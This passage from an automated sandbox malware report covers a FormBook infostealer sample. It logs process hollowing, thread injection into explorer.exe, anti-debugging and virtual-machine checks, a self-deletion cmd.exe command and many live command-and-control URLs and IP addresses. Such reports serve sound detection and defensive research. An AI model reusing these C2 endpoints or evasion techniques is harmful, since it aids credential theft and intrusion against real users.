00000004.00000002.573963572.000000000479F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.359586736.0000000004347000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: afhjjq.exe, 00000002.00000002.359776500.00000000012F0000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01322AA1 push ecx; ret 1_2_01322AB4
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B147D0 push ebp; iretd 1_2_02B147D6
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B14919 pushfd ; iretd 1_2_02B1491A
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B14905 push edx; iretd 1_2_02B14910
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0040E3B9 pushfd ; retf 2_2_0040E3BA
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00401408 push cs; ret 2_2_00401409
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_01322AA1 push ecx; ret 2_2_01322AB4
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01326096 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,1_2_01326096
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeFile created: C:\Users\user\AppData\Local\Temp\afhjjq.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE7
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-7844
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000359904 second address: 000000000035990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000000359B6E second address: 0000000000359B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe TID: 6008Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_1-5965
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 867Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 871Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeAPI coverage: 4.1 %
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B1310A GetSystemInfo,1_2_02B1310A
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeAPI call chain: ExitProcess graph end nodegraph_0-3480
          Source: explorer.exe, 00000003.00000002.582579454.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000003.536500707.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000003.536500707.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.323556878.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.533444927.000000000EFBE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533210056.000000000F0AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.587402417.000000000EFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533514048.000000000EFC5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.536280386.000000000EFC7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533339363.000000000F0B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000003.536500707.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000002.582579454.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.330681413.00000000087F4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01325B55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01325B55
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01326096 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,1_2_01326096
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_0132984C CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_0132984C
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B12AAB mov eax, dword ptr fs:[00000030h]1_2_02B12AAB
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B12A39 mov eax, dword ptr fs:[00000030h]1_2_02B12A39
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B12A6E mov eax, dword ptr fs:[00000030h]1_2_02B12A6E
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_02B1298F mov eax, dword ptr fs:[00000030h]1_2_02B1298F
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_0040ACE0 LdrLoadDll,2_2_0040ACE0
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01324954 SetUnhandledExceptionFilter,1_2_01324954
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01325B55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01325B55
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01329622 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01329622
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01323819 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_01323819
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_01324954 SetUnhandledExceptionFilter,2_2_01324954
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_01323819 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_01323819
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_01325B55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_01325B55
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 2_2_01329622 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_01329622

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.swegon.tech
          Source: C:\Windows\explorer.exeNetwork Connect: 170.33.13.246 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.linnus.shop
          Source: C:\Windows\explorer.exeDomain query: www.incentiveexcellence.com
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.113.136.229 80Jump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: B80000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\afhjjq.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3324Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeProcess created: C:\Users\user\AppData\Local\Temp\afhjjq.exe C:\Users\user\AppData\Local\Temp\afhjjq.exeJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\afhjjq.exe"Jump to behavior
          Source: explorer.exe, 00000003.00000003.547607432.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.327323422.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.322257277.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.322257277.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.573906384.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000003.00000000.322257277.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.573906384.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.322257277.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.573906384.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000000.321913311.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.572601902.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: GetLocaleInfoA,1_2_0132ADAD
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: GetLocaleInfoA,2_2_0132ADAD
          Source: C:\Users\user\AppData\Local\Temp\afhjjq.exeCode function: 1_2_01325578 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_01325578
          Source: C:\Users\user\Desktop\YSpCB8DEek.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.afhjjq.exe.12f0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.afhjjq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.afhjjq.exe.12f0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.afhjjq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.359618330.0000000000E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359445921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.359645033.0000000000EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572527306.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572610392.00000000007C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.572645078.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.318721808.00000000012F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts12
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		3
          Obfuscated Files or Information          		1
          Input Capture          		2
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts2
          Command and Scripting Interpreter          		Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager115
          System Information Discovery          		SMB/Windows Admin Shares1
          Input Capture          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Rootkit          		NTDS241
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer13
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 825979 Sample: YSpCB8DEek.exe Startdate: 14/03/2023 Architecture: WINDOWS Score: 100 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 4 other signatures 2->53 11 YSpCB8DEek.exe 19 2->11         started        process3 file4 31 C:\Users\user\AppData\Local\Temp\afhjjq.exe, PE32 11->31 dropped 14 afhjjq.exe 11->14         started        process5 signatures6 63 Antivirus detection for dropped file 14->63 65 Multi AV Scanner detection for dropped file 14->65 67 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 14->67 69 2 other signatures 14->69 17 afhjjq.exe 14->17         started        process7 signatures8 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Sample uses process hollowing technique 17->43 45 Queues an APC in another process (thread injection) 17->45 20 explorer.exe 1 17->20 injected process9 dnsIp10 33 linnus.shop 2.57.90.16, 49693, 80 AS-HOSTINGERLT Lithuania 20->33 35 www.incentiveexcellence.com 66.113.136.229, 49694, 80 AFFINITY-FTLUS United States 20->35 37 3 other IPs or domains 20->37 55 System process connects to network (likely due to code injection or exploit) 20->55 24 control.exe 20->24         started        signatures11 process12 signatures13 57 Modifies the context of a thread in another process (thread injection) 24->57 59 Maps a DLL or memory area into another process 24->59 61 Tries to detect virtualization through RDTSC time measurements 24->61 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          YSpCB8DEek.exe49%ReversingLabsWin32.Trojan.Nsisx
          YSpCB8DEek.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\afhjjq.exe100%AviraHEUR/AGEN.1242497
          C:\Users\user\AppData\Local\Temp\afhjjq.exe30%ReversingLabsWin32.Trojan.Generic

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.afhjjq.exe.12f0000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.afhjjq.exe.1320000.0.unpack100%AviraHEUR/AGEN.1242497Download File
          2.0.afhjjq.exe.1320000.0.unpack100%AviraHEUR/AGEN.1242497Download File
          2.2.afhjjq.exe.1320000.3.unpack100%AviraHEUR/AGEN.1242497Download File
          2.2.afhjjq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.hadafsazan.net/nes8/100%Avira URL Cloudmalware
          http://www.prvtg.top/nes8/www.innovativanimal.com100%Avira URL Cloudmalware
          http://www.purityrecruitment.com0%Avira URL Cloudsafe
          http://www.dietoll-official.siteReferer:0%Avira URL Cloudsafe
          http://www.jinglunqhd.com0%Avira URL Cloudsafe
          http://www.naturetechvr.com0%Avira URL Cloudsafe
          http://www.innovativanimal.com0%Avira URL Cloudsafe
          http://www.marketproinv.info0%Avira URL Cloudsafe
          http://www.marketproinv.info/nes8/www.prvtg.top100%Avira URL Cloudmalware
          http://www.enakslot.net0%Avira URL Cloudsafe
          http://www.hallmarklog.live0%Avira URL Cloudsafe
          http://www.purityrecruitment.comReferer:0%Avira URL Cloudsafe
          http://www.linnus.shopReferer:0%Avira URL Cloudsafe
          http://www.dietoll-official.site0%Avira URL Cloudsafe
          http://www.n7m.tokyoReferer:0%Avira URL Cloudsafe
          http://www.prvtg.top/nes8/100%Avira URL Cloudmalware
          http://www.hallmarklog.live/nes8/www.n7m.tokyo100%Avira URL Cloudmalware
          http://www.marketproinv.info/nes8/100%Avira URL Cloudmalware
          http://www.yaxin376.com/nes8/100%Avira URL Cloudmalware
          http://www.naturetechvr.com/nes8/100%Avira URL Cloudmalware
          http://www.incentiveexcellence.com/nes8/www.purityrecruitment.com100%Avira URL Cloudmalware
          http://redirect.aaaq.com/header.html0%Avira URL Cloudsafe
          http://www.swegon.tech/nes8/www.linnus.shop100%Avira URL Cloudmalware
          http://www.hallmarklog.liveReferer:0%Avira URL Cloudsafe
          http://www.marketproinv.infoReferer:0%Avira URL Cloudsafe
          http://www.enakslot.net/nes8/www.wordybag.online100%Avira URL Cloudmalware
          http://www.incentiveexcellence.com/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=VJV0NBieu5xy/+V3NiTJfFE8YIFhNCyGpCPWTH7L7kDRU9vDU50p89IeJ9KbRODmgBA3100%Avira URL Cloudmalware
          http://www.prvtg.topReferer:0%Avira URL Cloudsafe
          http://www.wordybag.onlineReferer:0%Avira URL Cloudsafe
          http://www.swegon.techReferer:0%Avira URL Cloudsafe
          http://www.linnus.shop/nes8/100%Avira URL Cloudmalware
          http://redirect.aaaq.com/location.cgi?dn=incentiveexcellence.com0%Avira URL Cloudsafe
          http://www.dietoll-official.site/nes8/100%Avira URL Cloudmalware
          http://www.wordybag.online/nes8/www.dietoll-official.site100%Avira URL Cloudmalware
          http://www.wordybag.online100%Avira URL Cloudmalware
          http://www.jinglunqhd.comReferer:0%Avira URL Cloudsafe
          http://www.purityrecruitment.com/nes8/100%Avira URL Cloudmalware
          http://www.yaxin376.com100%Avira URL Cloudmalware
          http://www.dietoll-official.site/nes8/www.hallmarklog.live100%Avira URL Cloudmalware
          http://www.innovativanimal.com/nes8/100%Avira URL Cloudmalware
          http://www.naturetechvr.comReferer:0%Avira URL Cloudsafe
          http://www.jinglunqhd.com/nes8/100%Avira URL Cloudmalware
          http://www.yaxin376.com/nes8/www.enakslot.net100%Avira URL Cloudmalware
          http://www.hallmarklog.live/nes8/100%Avira URL Cloudmalware
          http://www.n7m.tokyo/nes8/100%Avira URL Cloudmalware
          http://www.innovativanimal.com/nes8/www.yaxin376.com100%Avira URL Cloudmalware
          http://www.innovativanimal.comReferer:0%Avira URL Cloudsafe
          http://www.hadafsazan.net0%Avira URL Cloudsafe
          http://www.linnus.shop/nes8/?5jDX=+Cx+hhlra2ZnBXtbtOqG2CKZ6fBbmHz3v/4koY00IQGXr6Dpm6w3htg1kyr9LcS3Cwl2&wP=KB3xslvhyf-4Q2Gp100%Avira URL Cloudmalware
          http://www.purityrecruitment.com/nes8/www.marketproinv.info100%Avira URL Cloudmalware
          http://www.incentiveexcellence.comReferer:0%Avira URL Cloudsafe
          http://www.n7m.tokyo0%Avira URL Cloudsafe
          http://www.swegon.tech0%Avira URL Cloudsafe
          http://www.prvtg.top0%Avira URL Cloudsafe
          http://www.enakslot.netReferer:0%Avira URL Cloudsafe
          http://www.swegon.tech/nes8/?wP=KB3xslvhyf-4Q2Gp&5jDX=vrTXUzS5PKOapuU/J9WZ9j9UW2tlnl/e2NjFHhKzi+alY2A+qbqQAB9s++tQbSe7/Ij6100%Avira URL Cloudmalware
          http://www.swegon.tech/nes8/100%Avira URL Cloudmalware
